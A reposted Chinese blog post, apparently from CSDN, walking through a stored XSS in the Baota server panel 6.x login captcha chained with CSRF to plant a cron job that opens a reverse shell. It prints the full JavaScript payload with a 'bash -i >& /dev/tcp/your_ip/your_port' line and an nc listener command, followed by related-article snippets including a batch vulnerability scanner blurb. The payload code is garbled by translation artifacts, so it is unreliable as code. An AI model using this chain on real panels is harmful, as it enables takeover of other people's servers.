宝塔系统linux xss,宝塔面板6.x版本前台存储XSS+后台CSRF组合拳Getshell,xsscsrf

最新推荐文章于 2024-01-25 16:57:21 发布
最新推荐文章于 2024-01-25 16:57:21 发布
阅读量398 收藏
点赞数
文章标签: 宝塔系统linux xss

宝塔面板6.x版本前台存储XSS+后台CSRF组合拳Getshell,xsscsrf

对于宝塔漏洞复现和练习

0×00  什么是宝塔面板

宝塔面板是一款使用方便,功能强大且终身免费的服务器管理软件,支持Linux 与Windows 系统。一键配置:LAMP / LNMP ,网站,数据库,FTP ,SSL,通过Web 端轻松管理服务器。推出至今备受中小站点站长喜爱,下载量过百万。

0×01  漏洞成因

在6.x Linux 版本宝塔面板当中当中,相对与5.x 版本,记录了验证码错误并存入数据库当中,存储XSS缺陷就是在此处产生。 同时利用CSRF结合宝塔的计划任务反弹shell。

0×02   漏洞复现

首先访问后台,宝塔一般部署在8888 端口,

我们直接在面板登录处,随便输入一个账号密码,触发失败,要求输入验证码。

6a89f02d2de9ebcffb6420e6b3159ef2.png

然后我们在登陆,在验证码处输入XSS 利用代码测试

通过账号密码登陆宝塔后台,点开安全模块。我们可以看到触发了弹窗

由于宝塔面板的计划任务功能可以执行shell 脚本,所以我们可以基于这个xss 结合csrf 在计划任务功能处执行反弹shell 。

我们利用xss 平台(http://xsspt.com )新建一个项目执行自定义的js 脚本,修改里面的你的ip 和端口,代码如下

functionaddTask(TaskName,execTime,ip,port){var execShell ='bash -i>&/ dev / tcp / your_ip / your_port 0>&1';

execShell=encodeURIComponent(execShell);var params ='name ='+ TaskName +'&type = minute-n&where1 ='+ execTime +'&hour =&minute =&week =&sType = toShell&sBody ='+ execShell +'&sName =&backupTo = localhost&save =&urladdress = undefined'

var xhr = newXMLHttpRequest();

xhr.open('POST','/ crontab?action = AddCrontab',false);

xhr.setRequestHeader('Content-Type','application / x-www-form-urlencoded');

xhr.send(PARAMS);

}functionexecTask(TaskName){var xhr = newXMLHttpRequest();

xhr.open('POST','/ crontab?action = GetCrontab',true);

xhr.send();

xhr.οnlοad= function(){if(this.readyState == 4 && this.status == 200){var res = JSON.parse(this.responseText);if(res [0] .name ==TaskName){var TaskID = res [0] .id.toString();var xhr = newXMLHttpRequest();

xhr.open('POST','/ crontab?action = StartTask',false);

xhr.setRequestHeader('Content-Type','application / x-www-form-urlencoded');var params ='id ='+TaskID;

xhr.send(PARAMS);

delTask(RES [0] .ID);

的console.log(RES [0] .ID);return res [0] .id;

}

}

}

}functiondelTask(TaskID){var params ='id ='+TaskID.toString();var xhr = newXMLHttpRequest();

xhr.open('POST','/ crontab?action = DelCrontab',false);

xhr.setRequestHeader('Content-Type','application / x-www-form-urlencoded');

xhr.send(PARAMS);

}var TaskName = Math.random()。toString(36).substring(7);

addTask(TASKNAME,'5', '1.1.1.1', '53');

execTask(TASKNAME);

在本地通过nc 监听反弹的端口,nc.exe -l -vv -p 反弹端口

1F910H15-1.png

在然后后台通过登陆面板的验证码处插入我们配置好的跨站网站脚本代码

1F9102159-2.png

在登陆宝塔后台面板,点开安全模块。我们可以看到壳成功反弹

1F9104253-3.png

weixin_39929877
关注
[网络安全自学篇] 八十三.WHUCTF之CSS注入、越权、csrf-token窃取及XSS总结
杨秀璋的专栏
06-09 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了WHUCTF隐写和逆向题目,包括文字解密、图片解密、佛语解码、冰蝎流量分析、逆向分析。这篇文章将详细讲解一道CSS注入题目,包括CSS注入、越权、csrf-token窃取及CSP绕过,同时总结XSS绕过知识,希望对您有所帮助。第一次参加CTF,还是学到了很多东西。人生路上,要珍惜好每一天与家人陪伴的日子。感谢武汉大学,感谢这些大佬和师傅们(尤其出题和解题的老师们)~
[网络安全自学篇] 七十八.XSS跨站脚本攻击案例分享及总结(二)
杨秀璋的专栏
05-18 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了肖老师(Seak)的分享,介绍恶意代码与APT攻击中的武器,包括A2PT的攻击武器、普通APT组织的自研恶意代码、商用恶意代码、无恶意代码作业、开源和免费工具等。这些天分享了很多系统安全和软件安全的知识,接下来让我们回归网络安全,做做XSS跨站脚本攻击案例。这些题目来自Fox好友,在此感谢他。主要内容包括XSS原理、不同类型的XSSXSS靶场9道题目、如何防御XSS。希望您喜欢~
宝塔漏洞 XSS窃取宝塔面板管理员漏洞 高危
weixin_34161083的博客
11-12 3285
宝塔是近几年刚崛起的一款服务器面板,深受各大站长的喜欢,windows2003 windows2008windosws 2012系统linux centos deepin debian fedora系统都可以使用宝塔面板来管理服务器,宝塔可以一键部署网站的环境,IIS环境搭建,Nginx环境,PHP环境搭建,apache jsp环境,mysql数据库...
宝塔系统linux xss,宝塔面板6.x版本前台存储xss+后台csrf组合拳getshell
weixin_42298105的博客
05-24 355
本帖最后由 天析 于 2018-11-8 07:48 编辑文章名:宝塔面板6.x版本前台存储xss+后台csrf组合拳getshell转载地址:https://www.dafsec.org/284.html什么是宝塔面板宝塔面板是一款使用方便、功能强大且终身免费的服务器管理软件,支持LinuxWindows系统。一键配置AMP/LNMP、网站、数据库、FTP、SSL,通过Web端轻松管理服务器...
宝塔系统linux xss,某面板6.x的版本前台存储XSS + CSRF后台组合拳getshell
weixin_31486289的博客
05-24 427
【前言】什么是宝塔面板宝塔面板是一款使用方便,功能强大且终身免费的服务器管理软件,支持的Linux与视窗系统一键配置:。LAMP / LNMP,网站,数据库,FTP,SSL,通过Web端轻松管理服务器推出至今备受中小站点站长喜爱,下载量过百万。【漏洞代码分析】在6.x linux版本宝塔面板当中当中,相对与5.x版本,记录了验证码错误并存入数据库当中,存储xss缺陷就是在此处产生。。直接我们看漏...
宝塔面板 存储xss 弹弹弹
qq_41229707的博客
05-13 1267
今天下午喝了瓶老板买的王老吉 然后被抓去给客户建网站 所以打开了 公司 5.9.1版的大宝塔 旁边美工妹子 在看着 所以秀起了 自己的 linux命令行 可能是王老吉喝多了 就手抖了 就成这样了 没有过滤 随便弹 不说了 老板要打我了 补充下: 因为是公司的环境 我就不详细复现了 (因为是存储型的 弹完需要修复) 详细步骤是这样的: 宝塔 -> 文件选项 -> 点击终端-> 输入payload->弹出 欢迎大家来我的博客 ...
PhpMyWind 储存型 XSS 漏洞(CVE-2017-12984)
CuiXY's Blog
01-20 386
0x01 介绍 又是一款开源CMS内容管理系统PhpMyWind,在小于等于5.4版本中存在储存型XSS漏洞。如下图所示,这个就是发生储存型XSS漏洞的代码 0x02 演示 1.第一张图是客户留言时,对留言的内容进行htmlspecialchars函数过滤。第二张图是管理员在修改留言信息时并未对显示的内容进行过滤,所以导致了XSS攻击 2.首先进入客户留言板块,在内容处构造我们的POC,验证X...
渗透测试 2 --- XSSCSRF、文件上传、文件包含、反序列化漏洞
墨鱼菜鸡
07-11 3215
1、渗透测试 实用 浏览器插件 chrome、edge 插件:搜索 cookie,安装 cookie editor,打开插件,可以 导出 cookie HackBar :Hackbar是网络安全学习者常备的工具 (https://www.fujieace.com/hacker/tools/hackbar.html )。 ​解决Firefox插件-H...
实战审计cms之CSRF——CSRF+Xss+Flash钓鱼
hackzkaq的博客
05-18 550
更多渗透技能 欢迎搜索公众号:白帽子左一 作者:掌控安全-holic 前言 CSRF感觉似乎很不值钱的样子,我前几天审计出了3个后台存储xss+csrf 然后cnvd跟我说不收csrf后台存储xss,自此后台我从不找xsscsrf 但是毕竟作为目前毕竟出名流行的一个漏洞,还是讲解一下,我会讲的很简单,ojbk 0x01 CSRF介绍 CSRF的全名为Cross-site request forgery,它的中文名为 跨站请求伪造 CSRF是一种夹持用户在已经登陆的web应用程序上执行非本意的操
XSS漏洞学习笔记
qi_SJQ_的博客
12-31 2648
xss学习笔记
PC版宝塔漏洞批量扫描软件2020版
08-27
1.单个扫描只扫描域名列表第一个 2.批量扫描则扫描全部。 使用须知: 本程序只对未更新宝塔的用户有效, 如果扫出来的地址进不去,说明改网站宝塔版本已经更新了。
宝塔系统linux xss,宝塔漏洞 XSS窃取宝塔面板管理员漏洞 高危
weixin_28685045的博客
05-24 1304
宝塔是近几年刚崛起的一款服务器面板,深受各大站长的喜欢,windows2003 windows2008windosws 2012系统linux centos deepin debian fedora系统都可以使用宝塔面板来管理服务器,宝塔可以一键部署网站的环境,IIS环境搭建,Nginx环境,PHP环境搭建,apache jsp环境,mysql数据库,oracle数据库搭建,以及一键设置FTP...
宝塔Linux搭建靶场(DVWA,pikachu,sqli,upload,xxs)
AaronJJJ的博客
03-25 1545
宝塔Linux搭建靶场(DVWA,pikachu,sqli,upload,xxs)
堡塔云WAF:免费的私有云WAF防火墙,有效拦截CC攻击、sql注入、xss、一句话木马等渗透攻击
最新发布
linux8的博客
01-25 2481
在运维管理网站的同时,如果有遇到网站被挂马、sql注入、XSS跨站脚本、网页内容被篡改、页面盗链、网站内容数据泄露、网站被恶意扫描、cc攻击等一系列安全问题,推荐安装使用堡塔云WAF,避免您的网站资产数据泄露,保障网站安全。堡塔云WAF是基于宝塔面板千万级安装量的网站业务安全实战经验,打造的免费私有云WAF防火墙,有效拦截CC攻击、sql注入、xss、一句话木马、防采集等常见渗透攻击,为您的业务网站保驾护航。记录恶意攻击的拦截时间,攻击的网站对象以及攻击的URL地址,还有攻击IP及归属地和攻击类型。
存储XSS简介
seek_2022的博客
05-05 1万+
文章目录一、存储XSS简介(一)存储XSS的概念(二)存储XSS攻击过程(三)打XSS的潜在风险二、XSS平台使用方法三、靶场实战 一、存储XSS简介 (一)存储XSS的概念 存储XSS又称持久型XSS,攻击脚本将被永久地存放在目标服务器的数据库或文件中,具有很高的隐蔽性。反射型XSS的被攻击对象一般是攻击者去寻找的,就比如说:一个攻击者想盗取A的账号,那么攻击者就可以将一个含有反射型XSS的特制URL链接发送给A,然后用花言巧语诱骗A点击链接。当A不小心点进去时,就会立即受到XSS攻击。这种
宝塔面板v6.X破解思路&一键安装SHELL脚本(更新至6.8.4)
那时的天空很蓝
01-26 2650
乐在分享 作者博客地址 破解思路: 破解思路是由 @king51提出并实现的,该大佬对宝塔情有独钟,首次放出最完美的5.9专业版破解思路,导致宝塔官方第一次感受到了被破解的压力,将付费插件全部改由云端获取。然而…大佬还是找出了漏洞并且进行了实践,依旧完美破解。该思路其实对比5.9版,更简洁,但想到想到并实现这个思路比较难 修改插件过期时间 在 /class/pan...
关于使用宝塔面板遇到的一些坑
热门推荐
IT羊的博客
01-11 5万+
宝塔的liunx面板确实是我用过的至今为止最好的面板,简化很多操作,不过在使用做也会遇到一些坑,本文专门记录这些遇到的坑,顺便贴上宝塔的命令 http://www.bt.cn/btcode.html 1、重启服务器后面板打不开,网站不能访问,这个问题一般是掉盘引起的,解决方法是一般是用下面的命令修复下 wget -O update.sh http://download.bt.cn/ins
利用xss漏洞窃取cookie登录
黑面狐
08-23 1万+
今天在测试自己产品的时候,发现有个地方输入框执行javascript脚本。 正好趁着这个机会给小伙伴们演示xss的危害。 首先在XSS平台上搭建一个测试项目。 我用的是http://xss.fbisb.com这个的免费平台 项目配置选择默认就可以了。 然后直接复制平台提供的代码到存在xss漏洞的地方 保存以后,我让另一个同事登录,并点击这个模块。 这是XSS
iCMS前台存储XSS漏洞
云雕的博客
06-14 1385
该漏洞CNVD-ID: CNVD-2019-10126 漏洞提交CNVD后,待CNVD公示才发出本文。 测试环境: 程序版本:v7.0.14 Windows + firefox + burpsuite + apache2 + PHP5.6.27(phpStudy集成环境) iCMS官网:https://www.icmsdev.com/ 一、漏洞分析 1、新用户注册时,输入注册邮箱,系统会自动查找数...
xss+csrf组合拳
09-20
XSSCSRF是两种常见的网络安全漏洞。当它们结合在一起时,会构成一种更加危险的攻击方式,被称为"XSS CSRF组合拳"。下面是一种可能的攻击方式: 1. 攻击者在恶意网站B中插入CSRF payload,并使用该CSRF payload修改用户在A网站的昵称为XSS payload。 2. 攻击者诱使用户访问恶意网站B,触发CSRF payload,导致用户在A网站的昵称被修改为XSS payload。 3. 当用户重新访问A网站时,XSS payload会被触发,从而获取到用户的Cookie信息。 为了防御这种攻击,可以采取以下措施: 1. 在服务端对用户输入进行严格的过滤和验证,特别是在对用户输入进行展示的地方,避免将用户输入作为代码执行。 2. 对于敏感操作,使用CSRF Token来验证请求的合法性。确保每个请求都包含一个随机生成的Token,并在服务端验证该Token的有效性。 3. 在Cookie中使用HttpOnly属性,以防止JavaScript通过document.cookie来获取Cookie信息。 4. 设置合适的Content Security Policy (CSP)来限制页面中可以加载的资源和代码。 以上是一种常见的XSS CSRF组合拳攻击方式以及相应的防御措施,但仍然有其他的攻击方式和防御策略。建议综合使用多种防御措施以提高系统的安全性。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值